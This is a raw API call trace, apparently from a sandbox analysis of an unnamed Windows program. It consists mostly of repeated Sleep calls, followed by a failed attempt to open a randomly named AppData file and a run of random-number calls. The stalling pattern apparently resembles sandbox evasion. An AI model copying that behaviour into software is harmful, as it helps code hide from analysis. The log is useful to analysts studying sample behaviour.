[0204.924] Sleep (dwMilliseconds=0x258) [0204.939] Sleep (dwMilliseconds=0x258) [0205.002] Sleep (dwMilliseconds=0x258) [0205.063] Sleep (dwMilliseconds=0x258) [0205.098] Sleep (dwMilliseconds=0x258) [0205.111] Sleep (dwMilliseconds=0x258) [0205.126] Sleep (dwMilliseconds=0x258) [0205.142] Sleep (dwMilliseconds=0x258) [0205.158] Sleep (dwMilliseconds=0x258) [0205.174] Sleep (dwMilliseconds=0x258) [0205.235] Sleep (dwMilliseconds=0x258) [0205.296] Sleep (dwMilliseconds=0x258) [0205.336] Sleep (dwMilliseconds=0x258) [0205.345] Sleep (dwMilliseconds=0x258) [0205.360] Sleep (dwMilliseconds=0x258) [0205.376] Sleep (dwMilliseconds=0x258) [0205.392] Sleep (dwMilliseconds=0x258) [0205.408] Sleep (dwMilliseconds=0x258) [0205.469] Sleep (dwMilliseconds=0x258) [0205.517] Sleep (dwMilliseconds=0x258) [0205.535] Sleep (dwMilliseconds=0x258) [0205.548] Sleep (dwMilliseconds=0x258) [0205.563] Sleep (dwMilliseconds=0x258) [0205.579] Sleep (dwMilliseconds=0x258) [0205.594] Sleep (dwMilliseconds=0x258) [0205.610] Sleep (dwMilliseconds=0x258) [0205.661] Sleep (dwMilliseconds=0x258) [0205.704] Sleep (dwMilliseconds=0x258) [0205.754] Sleep (dwMilliseconds=0x258) [0205.766] Sleep (dwMilliseconds=0x258) [0205.782] Sleep (dwMilliseconds=0x258) [0205.797] Sleep (dwMilliseconds=0x258) [0205.813] Sleep (dwMilliseconds=0x258) [0205.828] Sleep (dwMilliseconds=0x258) [0205.891] Sleep (dwMilliseconds=0x258) [0205.937] Sleep (dwMilliseconds=0x258) [0205.961] Sleep (dwMilliseconds=0x258) [0205.969] Sleep (dwMilliseconds=0x258) [0205.984] Sleep (dwMilliseconds=0x258) [0206.001] Sleep (dwMilliseconds=0x258) [0206.016] Sleep (dwMilliseconds=0x258) [0206.031] Sleep (dwMilliseconds=0x258) [0206.109] Sleep (dwMilliseconds=0x258) [0206.156] Sleep (dwMilliseconds=0x258) [0206.182] Sleep (dwMilliseconds=0x258) [0206.187] Sleep (dwMilliseconds=0x258) [0206.203] Sleep (dwMilliseconds=0x258) [0206.219] Sleep (dwMilliseconds=0x258) [0206.234] Sleep (dwMilliseconds=0x258) [0206.250] Sleep (dwMilliseconds=0x258) [0206.265] Sleep (dwMilliseconds=0x258) [0206.328] Sleep (dwMilliseconds=0x258) [0206.374] Sleep (dwMilliseconds=0x258) [0206.412] Sleep (dwMilliseconds=0x258) [0206.421] Sleep (dwMilliseconds=0x258) [0206.437] Sleep (dwMilliseconds=0x258) [0206.452] Sleep (dwMilliseconds=0x258) [0206.468] Sleep (dwMilliseconds=0x258) [0206.483] Sleep (dwMilliseconds=0x258) [0206.546] Sleep (dwMilliseconds=0x258) [0206.593] Sleep (dwMilliseconds=0x258) [0206.631] Sleep (dwMilliseconds=0x258) [0206.639] Sleep (dwMilliseconds=0x258) [0206.655] Sleep (dwMilliseconds=0x258) [0206.671] Sleep (dwMilliseconds=0x258) [0206.686] Sleep (dwMilliseconds=0x258) [0206.702] Sleep (dwMilliseconds=0x258) [0206.764] Sleep (dwMilliseconds=0x258) [0206.812] Sleep (dwMilliseconds=0x258) [0206.835] Sleep (dwMilliseconds=0x258) [0206.843] Sleep (dwMilliseconds=0x258) [0206.858] Sleep (dwMilliseconds=0x258) [0206.874] Sleep (dwMilliseconds=0x258) [0206.889] Sleep (dwMilliseconds=0x258) [0206.905] Sleep (dwMilliseconds=0x258) [0206.920] Sleep (dwMilliseconds=0x258) [0206.983] Sleep (dwMilliseconds=0x258) [0207.029] Sleep (dwMilliseconds=0x258) [0207.072] Sleep (dwMilliseconds=0x258) [0207.077] Sleep (dwMilliseconds=0x258) [0207.092] Sleep (dwMilliseconds=0x258) [0207.107] Sleep (dwMilliseconds=0x258) [0207.123] Sleep (dwMilliseconds=0x258) [0207.187] Sleep (dwMilliseconds=0x258) [0207.232] Sleep (dwMilliseconds=0x258) [0207.259] Sleep (dwMilliseconds=0x258) [0207.263] Sleep (dwMilliseconds=0x258) [0207.279] Sleep (dwMilliseconds=0x258) [0207.296] Sleep (dwMilliseconds=0x258) [0207.311] Sleep (dwMilliseconds=0x258) [0207.326] Sleep (dwMilliseconds=0x258) [0207.388] Sleep (dwMilliseconds=0x258) [0207.437] Sleep (dwMilliseconds=0x258) [0207.473] Sleep (dwMilliseconds=0x258) [0207.482] Sleep (dwMilliseconds=0x258) [0207.498] Sleep (dwMilliseconds=0x258) [0207.513] Sleep (dwMilliseconds=0x258) [0207.529] Sleep (dwMilliseconds=0x258) [0207.545] Sleep (dwMilliseconds=0x258) [0207.607] Sleep (dwMilliseconds=0x258) [0207.654] Sleep (dwMilliseconds=0x258) [0207.675] Sleep (dwMilliseconds=0x258) [0207.685] Sleep (dwMilliseconds=0x258) [0207.700] Sleep (dwMilliseconds=0x258) [0207.716] Sleep (dwMilliseconds=0x258) [0207.732] Sleep (dwMilliseconds=0x258) [0207.747] Sleep (dwMilliseconds=0x258) [0207.810] Sleep (dwMilliseconds=0x258) [0207.856] Sleep (dwMilliseconds=0x258) [0207.911] Sleep (dwMilliseconds=0x258) [0207.919] Sleep (dwMilliseconds=0x258) [0207.934] Sleep (dwMilliseconds=0x258) [0207.951] Sleep (dwMilliseconds=0x258) [0207.966] Sleep (dwMilliseconds=0x258) [0208.028] Sleep (dwMilliseconds=0x258) [0208.075] Sleep (dwMilliseconds=0x258) [0208.103] Sleep (dwMilliseconds=0x258) [0208.107] Sleep (dwMilliseconds=0x258) [0208.122] Sleep (dwMilliseconds=0x258) [0208.138] Sleep (dwMilliseconds=0x258) [0208.153] Sleep (dwMilliseconds=0x258) [0208.168] Sleep (dwMilliseconds=0x258) [0208.231] Sleep (dwMilliseconds=0x258) [0208.278] Sleep (dwMilliseconds=0x258) [0208.293] Sleep (dwMilliseconds=0x258) [0208.309] Sleep (dwMilliseconds=0x258) [0208.324] Sleep (dwMilliseconds=0x258) [0208.340] Sleep (dwMilliseconds=0x258) [0208.355] Sleep (dwMilliseconds=0x258) [0208.371] Sleep (dwMilliseconds=0x258) [0208.433] Sleep (dwMilliseconds=0x258) [0208.480] Sleep (dwMilliseconds=0x258) [0208.501] Sleep (dwMilliseconds=0x258) [0208.511] Sleep (dwMilliseconds=0x258) [0208.527] Sleep (dwMilliseconds=0x258) [0208.543] Sleep (dwMilliseconds=0x258) [0208.558] Sleep (dwMilliseconds=0x258) [0208.574] Sleep (dwMilliseconds=0x258) [0208.636] Sleep (dwMilliseconds=0x258) [0208.683] Sleep (dwMilliseconds=0x258) [0208.712] Sleep (dwMilliseconds=0x258) [0208.714] Sleep (dwMilliseconds=0x258) [0208.731] Sleep (dwMilliseconds=0x258) [0208.746] Sleep (dwMilliseconds=0x258) [0208.761] Sleep (dwMilliseconds=0x258) [0208.788] Sleep (dwMilliseconds=0x258) [0208.792] Sleep (dwMilliseconds=0x258) [0208.855] Sleep (dwMilliseconds=0x258) [0208.906] Sleep (dwMilliseconds=0x258) [0208.943] Sleep (dwMilliseconds=0x258) [0208.968] Sleep (dwMilliseconds=0x258) [0208.979] Sleep (dwMilliseconds=0x258) [0208.996] Sleep (dwMilliseconds=0x258) [0209.013] Sleep (dwMilliseconds=0x258) [0209.073] Sleep (dwMilliseconds=0x258) [0209.120] Sleep (dwMilliseconds=0x258) [0209.163] Sleep (dwMilliseconds=0x258) [0209.173] Sleep (dwMilliseconds=0x258) [0209.183] Sleep (dwMilliseconds=0x258) [0209.198] Sleep (dwMilliseconds=0x258) [0209.214] Sleep (dwMilliseconds=0x258) [0209.229] Sleep (dwMilliseconds=0x258) [0209.250] Sleep (dwMilliseconds=0x258) [0209.311] Sleep (dwMilliseconds=0x258) [0209.355] Sleep (dwMilliseconds=0x258) [0209.369] Sleep (dwMilliseconds=0x258) [0209.385] Sleep (dwMilliseconds=0x258) [0209.401] Sleep (dwMilliseconds=0x258) [0209.417] Sleep (dwMilliseconds=0x258) [0209.432] Sleep (dwMilliseconds=0x258) [0209.448] Sleep (dwMilliseconds=0x258) [0209.510] Sleep (dwMilliseconds=0x258) [0209.543] Sleep (dwMilliseconds=0x258) [0209.586] Sleep (dwMilliseconds=0x258) [0209.588] Sleep (dwMilliseconds=0x258) [0209.605] Sleep (dwMilliseconds=0x258) [0209.619] Sleep (dwMilliseconds=0x258) [0209.635] Sleep (dwMilliseconds=0x258) [0209.651] Sleep (dwMilliseconds=0x258) [0209.698] Sleep (dwMilliseconds=0x258) [0209.745] Sleep (dwMilliseconds=0x258) [0209.783] Sleep (dwMilliseconds=0x258) [0209.793] Sleep (dwMilliseconds=0x258) [0209.807] Sleep (dwMilliseconds=0x258) [0209.822] Sleep (dwMilliseconds=0x258) [0209.838] Sleep (dwMilliseconds=0x258) [0209.857] Sleep (dwMilliseconds=0x258) [0209.869] Sleep (dwMilliseconds=0x258) [0209.931] Sleep (dwMilliseconds=0x258) [0209.978] Sleep (dwMilliseconds=0x258) [0210.030] Sleep (dwMilliseconds=0x258) [0210.087] Sleep (dwMilliseconds=0x258) [0210.134] Sleep (dwMilliseconds=0x258) [0210.182] Sleep (dwMilliseconds=0x258) [0210.205] Sleep (dwMilliseconds=0x258) [0210.212] Sleep (dwMilliseconds=0x258) [0210.227] Sleep (dwMilliseconds=0x258) [0210.243] Sleep (dwMilliseconds=0x258) [0210.259] Sleep (dwMilliseconds=0x258) [0210.274] Sleep (dwMilliseconds=0x258) [0210.323] Sleep (dwMilliseconds=0x258) [0210.368] Sleep (dwMilliseconds=0x258) [0210.418] Sleep (dwMilliseconds=0x258) [0210.431] Sleep (dwMilliseconds=0x258) [0210.446] Sleep (dwMilliseconds=0x258) [0210.462] Sleep (dwMilliseconds=0x258) [0210.477] Sleep (dwMilliseconds=0x258) [0210.540] Sleep (dwMilliseconds=0x258) [0210.586] Sleep (dwMilliseconds=0x258) [0210.632] Sleep (dwMilliseconds=0x258) [0210.633] Sleep (dwMilliseconds=0x258) [0210.650] Sleep (dwMilliseconds=0x258) [0210.664] Sleep (dwMilliseconds=0x258) [0210.680] Sleep (dwMilliseconds=0x258) [0210.696] Sleep (dwMilliseconds=0x258) [0210.758] Sleep (dwMilliseconds=0x258) [0210.805] Sleep (dwMilliseconds=0x258) [0210.844] Sleep (dwMilliseconds=0x258) [0210.860] Sleep (dwMilliseconds=0x258) [0210.867] Sleep (dwMilliseconds=0x258) [0210.883] Sleep (dwMilliseconds=0x258) [0210.898] Sleep (dwMilliseconds=0x258) [0210.914] Sleep (dwMilliseconds=0x258) [0210.976] Sleep (dwMilliseconds=0x258) [0211.024] Sleep (dwMilliseconds=0x258) [0211.054] Sleep (dwMilliseconds=0x258) [0211.073] Sleep (dwMilliseconds=0x258) [0211.087] Sleep (dwMilliseconds=0x258) [0211.101] Sleep (dwMilliseconds=0x258) [0211.117] Sleep (dwMilliseconds=0x258) [0211.180] Sleep (dwMilliseconds=0x258) [0211.226] Sleep (dwMilliseconds=0x258) [0211.251] Sleep (dwMilliseconds=0x258) [0211.257] Sleep (dwMilliseconds=0x258) [0211.273] Sleep (dwMilliseconds=0x258) [0211.290] Sleep (dwMilliseconds=0x258) [0211.304] Sleep (dwMilliseconds=0x258) [0211.320] Sleep (dwMilliseconds=0x258) [0211.335] Sleep (dwMilliseconds=0x258) [0211.398] Sleep (dwMilliseconds=0x258) [0211.447] Sleep (dwMilliseconds=0x258) [0211.461] Sleep (dwMilliseconds=0x258) [0211.476] Sleep (dwMilliseconds=0x258) [0211.491] Sleep (dwMilliseconds=0x258) [0211.508] Sleep (dwMilliseconds=0x258) [0211.523] Sleep (dwMilliseconds=0x258) [0211.538] Sleep (dwMilliseconds=0x258) [0211.600] Sleep (dwMilliseconds=0x258) [0211.647] Sleep (dwMilliseconds=0x258) [0211.664] Sleep (dwMilliseconds=0x258) [0211.678] Sleep (dwMilliseconds=0x258) [0211.694] Sleep (dwMilliseconds=0x258) [0211.710] Sleep (dwMilliseconds=0x258) [0211.727] Sleep (dwMilliseconds=0x258) [0211.741] Sleep (dwMilliseconds=0x258) [0211.805] Sleep (dwMilliseconds=0x258) [0211.897] Sleep (dwMilliseconds=0x258) [0211.923] Sleep (dwMilliseconds=0x258) [0211.928] Sleep (dwMilliseconds=0x258) [0211.944] Sleep (dwMilliseconds=0x258) [0211.962] Sleep (dwMilliseconds=0x258) [0211.976] Sleep (dwMilliseconds=0x258) [0211.991] Sleep (dwMilliseconds=0x258) [0212.071] Sleep (dwMilliseconds=0x258) [0212.116] Sleep (dwMilliseconds=0x258) [0212.132] Sleep (dwMilliseconds=0x258) [0212.146] Sleep (dwMilliseconds=0x258) [0212.162] Sleep (dwMilliseconds=0x258) [0212.180] Sleep (dwMilliseconds=0x258) [0212.193] Sleep (dwMilliseconds=0x258) [0212.209] Sleep (dwMilliseconds=0x258) [0212.272] Sleep (dwMilliseconds=0x258) [0212.319] Sleep (dwMilliseconds=0x258) [0212.333] Sleep (dwMilliseconds=0x258) [0212.349] Sleep (dwMilliseconds=0x258) [0212.366] Sleep (dwMilliseconds=0x258) [0212.381] Sleep (dwMilliseconds=0x258) [0212.396] Sleep (dwMilliseconds=0x258) [0212.412] Sleep (dwMilliseconds=0x258) [0212.521] Sleep (dwMilliseconds=0x258) [0212.545] Sleep (dwMilliseconds=0x258) [0212.552] Sleep (dwMilliseconds=0x258) [0212.568] Sleep (dwMilliseconds=0x258) [0212.583] Sleep (dwMilliseconds=0x258) [0212.599] Sleep (dwMilliseconds=0x258) [0212.614] Sleep (dwMilliseconds=0x258) [0212.630] Sleep (dwMilliseconds=0x258) [0212.692] Sleep (dwMilliseconds=0x258) [0212.739] Sleep (dwMilliseconds=0x258) [0212.765] Sleep (dwMilliseconds=0x258) [0212.772] Sleep (dwMilliseconds=0x258) [0212.786] Sleep (dwMilliseconds=0x258) [0212.802] Sleep (dwMilliseconds=0x258) [0212.817] Sleep (dwMilliseconds=0x258) [0212.833] Sleep (dwMilliseconds=0x258) [0212.895] Sleep (dwMilliseconds=0x258) [0212.942] Sleep (dwMilliseconds=0x258) [0212.988] Sleep (dwMilliseconds=0x258) [0212.989] Sleep (dwMilliseconds=0x258) [0213.004] Sleep (dwMilliseconds=0x258) [0213.020] Sleep (dwMilliseconds=0x258) [0213.038] Sleep (dwMilliseconds=0x258) [0213.075] Sleep (dwMilliseconds=0x258) [0213.114] Sleep (dwMilliseconds=0x258) [0213.161] Sleep (dwMilliseconds=0x258) [0213.197] Sleep (dwMilliseconds=0x258) [0213.207] Sleep (dwMilliseconds=0x258) [0213.224] Sleep (dwMilliseconds=0x258) [0213.238] Sleep (dwMilliseconds=0x258) [0213.254] Sleep (dwMilliseconds=0x258) [0213.270] Sleep (dwMilliseconds=0x258) [0213.332] Sleep (dwMilliseconds=0x258) [0213.379] Sleep (dwMilliseconds=0x258) [0213.406] Sleep (dwMilliseconds=0x258) [0213.410] Sleep (dwMilliseconds=0x258) [0213.426] Sleep (dwMilliseconds=0x258) [0213.441] Sleep (dwMilliseconds=0x258) [0213.457] Sleep (dwMilliseconds=0x258) [0213.472] Sleep (dwMilliseconds=0x258) [0213.488] Sleep (dwMilliseconds=0x258) [0213.597] Sleep (dwMilliseconds=0x258) [0213.613] Sleep (dwMilliseconds=0x258) [0213.628] Sleep (dwMilliseconds=0x258) [0213.644] Sleep (dwMilliseconds=0x258) [0213.660] Sleep (dwMilliseconds=0x258) [0213.675] Sleep (dwMilliseconds=0x258) [0213.691] Sleep (dwMilliseconds=0x258) [0213.756] Sleep (dwMilliseconds=0x258) [0213.810] Sleep (dwMilliseconds=0x258) [0213.816] Sleep (dwMilliseconds=0x258) [0213.831] Sleep (dwMilliseconds=0x258) [0213.849] Sleep (dwMilliseconds=0x258) [0213.865] Sleep (dwMilliseconds=0x258) [0213.878] Sleep (dwMilliseconds=0x258) [0213.893] Sleep (dwMilliseconds=0x258) [0213.956] Sleep (dwMilliseconds=0x258) [0214.003] Sleep (dwMilliseconds=0x258) [0214.024] Sleep (dwMilliseconds=0x258) [0214.034] Sleep (dwMilliseconds=0x258) [0214.078] Sleep (dwMilliseconds=0x258) [0214.081] Sleep (dwMilliseconds=0x258) [0214.096] Sleep (dwMilliseconds=0x258) [0214.112] Sleep (dwMilliseconds=0x258) [0214.174] Sleep (dwMilliseconds=0x258) [0214.221] Sleep (dwMilliseconds=0x258) [0214.237] Sleep (dwMilliseconds=0x258) [0214.252] Sleep (dwMilliseconds=0x258) [0214.268] Sleep (dwMilliseconds=0x258) [0214.284] Sleep (dwMilliseconds=0x258) [0214.299] Sleep (dwMilliseconds=0x258) [0214.315] Sleep (dwMilliseconds=0x258) [0214.377] Sleep (dwMilliseconds=0x258) [0214.424] Sleep (dwMilliseconds=0x258) [0214.443] Sleep (dwMilliseconds=0x258) [0214.455] Sleep (dwMilliseconds=0x258) [0214.471] Sleep (dwMilliseconds=0x258) [0214.486] Sleep (dwMilliseconds=0x258) [0214.502] Sleep (dwMilliseconds=0x258) [0214.518] Sleep (dwMilliseconds=0x258) [0214.580] Sleep (dwMilliseconds=0x258) [0214.627] Sleep (dwMilliseconds=0x258) [0214.643] Sleep (dwMilliseconds=0x258) [0214.658] Sleep (dwMilliseconds=0x258) [0214.673] Sleep (dwMilliseconds=0x258) [0214.689] Sleep (dwMilliseconds=0x258) [0214.705] Sleep (dwMilliseconds=0x258) [0214.720] Sleep (dwMilliseconds=0x258) [0214.783] Sleep (dwMilliseconds=0x258) [0214.830] Sleep (dwMilliseconds=0x258) [0214.845] Sleep (dwMilliseconds=0x258) [0214.862] Sleep (dwMilliseconds=0x258) [0214.878] Sleep (dwMilliseconds=0x258) [0214.892] Sleep (dwMilliseconds=0x258) [0214.907] Sleep (dwMilliseconds=0x258) [0214.934] Sleep (dwMilliseconds=0x258) [0214.986] Sleep (dwMilliseconds=0x258) [0215.032] Sleep (dwMilliseconds=0x258) [0215.072] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x26) returned 0x7f52300 [0215.072] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x216c5584 [0215.074] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xe4) returned 0x7f523b0 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x25f76097 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x44a1b30f [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3421d449 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x18a48647 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1a91f4d0 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x44de047f [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x46348d85 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2aa232e3 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7ec54343 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5a832101 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x312e4089 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2c333510 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22c7ada5 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4c6d7b0e [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x53ccc5c1 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xd707134 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x789a9aa7 [0215.074] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4008ce0c [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x299a04de [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x73e69270 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x453c3817 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1df220a4 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x70583840 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1670bb0b [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2160e132 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7d398f41 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6c599539 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x73f6b13d [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x681d212f [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3fb068fa [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x14699dc6 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xf5a291f [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3427e496 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3a8fc275 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x71a92608 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x58a78969 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3a8ac25a [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57c446cb [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x56e41b50 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5cceaff7 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4543ac8 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x289aa282 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x53593a09 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x276a11a2 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7dec761c [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x146f4152 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x79ed6db9 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x395b7e5f [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2a953d91 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x428b5d04 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x32ee90d1 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x39d70962 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2ca168ac [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ce61a5a [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x68d6e09c [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7977a058 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4d1cf3c2 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x54330571 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x28fdb566 [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x574d483c [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x95b784e [0215.075] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x72fe2442 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7596b982 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b39d10a [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4205fa49 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1b2af242 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x659c0dce [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x20b9db7f [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7cd9537c [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x33f0e193 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x64f9b437 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x117c40 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2d1fe1c4 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x386cd1f5 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x571403d0 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5096318b [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2172e0fc [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x570d87cb [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5e8756d3 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xd164378 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3409edc0 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3a41abd8 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x47e31d50 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5158770d [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x66da927b [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x62233156 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c21dfc1 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7f3d1ab0 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5a7be4e0 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23567c90 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4c081a97 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38ebe921 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x520be4c0 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x104e0c60 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57c0b72f [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x41a8b622 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57f7a7e6 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xb24cbce [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5109efd6 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7e16b8b3 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x352c95b3 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4f13dc2c [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2954956c [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x179dfe78 